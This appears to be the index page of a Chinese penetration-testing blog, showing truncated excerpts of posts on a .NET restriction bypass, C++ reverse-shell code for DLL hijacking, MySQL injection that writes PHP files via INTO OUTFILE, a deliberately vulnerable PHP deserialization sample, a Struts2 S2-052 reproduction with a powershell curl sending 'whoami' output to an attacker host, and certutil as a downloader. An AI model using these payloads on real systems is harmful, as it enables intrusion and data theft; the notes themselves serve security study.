热门 .net突破限制执行命令

时间:2017-12-28   作者:webbaozi   分类: 小技巧   热度:2291°    
时间:2017-12-28   分类: 小技巧    热度:2291  
.net突破限制执行命令
遇见过一次可以使用 受影响的版本为: Microsoft .NET Framework 2.0  Microsoft .NET Framework 3.5 Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4 Microsoft .NET Framework 4.5 Microsoft .NET Framework 4.5.1 利用条件: 1.需要支持aspx并且高于Microsoft .NET Framework 1.14版本 2....

阅读全文>>

阅读全文»

热门 c++反弹代码

时间:2017-10-30   作者:webbaozi   分类: 渗透测试   热度:1537°    
时间:2017-10-30   分类: 渗透测试    热度:1537  
c++反弹代码
在dll劫持中使用挺不错的,之前放在nopad++中,成功反弹。 代码如下: LPCSTR szMyUniqueNamedEvent = "sysnullevt"; HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent); switch (GetLastError()) { // app is already running case ERROR_ALREADY_EXISTS: { CloseHandle(m_hEvent); bre...

阅读全文>>

阅读全文»

热门 通过mysql注入写文件

时间:2017-10-30   作者:webbaozi   分类: 小技巧   热度:2520°    
时间:2017-10-30   分类: 小技巧    热度:2520  
通过mysql注入写文件
1. select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php'   2. select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666F28293B3F3E-- 此写法需要查询出数据,才能...

阅读全文>>

阅读全文»

热门 php反序列小记

时间:2017-10-21   作者:webbaozi   分类: 小技巧   热度:1596°    
时间:2017-10-21   分类: 小技巧    热度:1596  
php反序列小记
存在反序列漏洞的php代码 <html> <head> <title>WEB</title> </head> <body> <?php class Readflag{ var $file; function __destruct(){ if(isset($this->file)){ echo file_get_contents($this->file); } } function __wakeup(){ if($this->fi...

阅读全文>>

阅读全文»

热门 struts2-02-052复现笔记

时间:2017-9-6   作者:webbaozi   分类: 小技巧   热度:1435°    
时间:2017-9-6   分类: 小技巧    热度:1435  
struts2-02-052复现笔记
网上已经有很多复现过程了,这里就做个笔记 vps上执行: python -m SimpleHTTPServer 8080 然后执行命令powershell "curl http://ip:port/index.php?whoami=$(whoami)" powershell支持curl(测试机win7powershell不支持curl,未测) POST /struts2-rest-showcase/orders/4 HTTP/1.1 Host: 192.168.1.212 User-Agen...

阅读全文>>

阅读全文»

热门 渗透测试中的certutil

时间:2017-8-10   作者:webbaozi   分类: 小技巧   热度:4021°    
时间:2017-8-10   分类: 小技巧    热度:4021  
渗透测试中的certutil
0x00 前言 最近在Casey Smith‏ @subTee的twitter上学到了关于certutil的一些利用技巧。本文将结合自己的一些经验,介绍certutil在渗透测试中的应用,对cmd下downloader的实现方法作补充,总结base64编码转换的常用方法。 学习地址: https://twitter.com/subTee/status/888101536475344896 https://twitter.com/subTee/status/888071631528235010 0x01 简介 本文...

阅读全文>>

阅读全文»
返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1